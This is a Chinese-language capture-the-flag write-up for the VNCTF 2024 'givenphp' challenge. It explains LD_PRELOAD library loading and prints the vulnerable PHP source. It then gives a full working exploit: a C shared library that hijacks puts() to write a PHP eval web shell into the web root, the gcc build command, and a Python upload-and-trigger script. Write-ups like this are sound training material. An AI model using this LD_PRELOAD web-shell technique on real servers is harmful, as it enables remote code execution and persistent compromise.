2024 vnctf givenphp

前置知识

LD_LIBRARY_PATH

是一个linux的环境变量,当执行一个程序时,如果此程序依赖于动态链接的共享库,也就是.so文件,会先在查找LD_LIBRARY_PATH环境变量指定的目录然后是默认共享库(/lib ,/user/lib)

LD_PRELOAD

LD_PRELOAD 中指定的文件会在动态链接器按照固定规则搜索共享库之前装载,他比 LD_LIBRARY_PATH 所指定的目录中的共享库还要优先

共享库(如:动态库)搜索顺序如下:

  1. LD_PRELOAD 环境变量指定的共享库路径;

  2. LD_LIBRARY_PATH 环境变量指定的共享库路径;

  3. -rpath 链接时指定的共享库路径;

  4. /etc/ld.so.conf 配置文件指定的共享库路径;

  5. 默认共享库路径,/usr/lib,lib

    题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
highlight_file(__FILE__);
if(isset($_POST['upload'])){
    handleFileUpload($_FILES['file']);
}

if(isset($_GET['challenge'])){
    waf();
    $value=$_GET['value'];
    $key=$_GET['key'];
    $func=create_function("","putenv('$key=$value');");
    if($func==$_GET['guess']){
        $func();
        system("whoami");
    }
}
function waf()
{
    if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){
        die("evil input!!!");
    }
}
function handleFileUpload($file)
{
    $uploadDirectory = '/tmp/';

    if ($file['error'] !== UPLOAD_ERR_OK) {
        echo '文件上传失败。';
        return;
    }
    $fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION);

    $newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension;
    $destination = $uploadDirectory . $newFileName;
    if (move_uploaded_file($file['tmp_name'], $destination)) {
        echo $destination;
    } else {
        echo '文件移动失败。';
    }
}

题目有两个功能,一个是文件上传到/tmp目录下,还有一个是环境变量修改

根据本地测试,无论key和value是什么,$fun都是 \x00lambda_1

然后是LD劫持

1.c,把木马写到www目录下

1
2
3
4
5
6
7
8
#include <stdio.h>
#include <stdlib.h>

int puts(const char *message) {
  printf("ok");
  system("echo '<?php @eval($_POST[1]);?>' > /var/www/html/shell.php");
  return 0;
}

kail执行命令生成1.so文件

1
gcc -fPIC -shared -o 1.so 1.c -nostartfiles

python 发上传包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
url = 'http://6179e5b0-1ddf-43cc-8135-8796de783f38.vnctf2024.manqiu.top/'

data = {
    "upload":1
}
file = {
    "file":open('1.so','rb')
}
r = requests.post(url,data=data,files=file)
# print(r.text)

value = r.text[-45:]

param = {
    "challenge":1,
    "key":"LD_PRELOAD",
    "value":value,
    "guess":'\x00lambda_1'
}
r = requests.get(url,params=param)
print(r.text)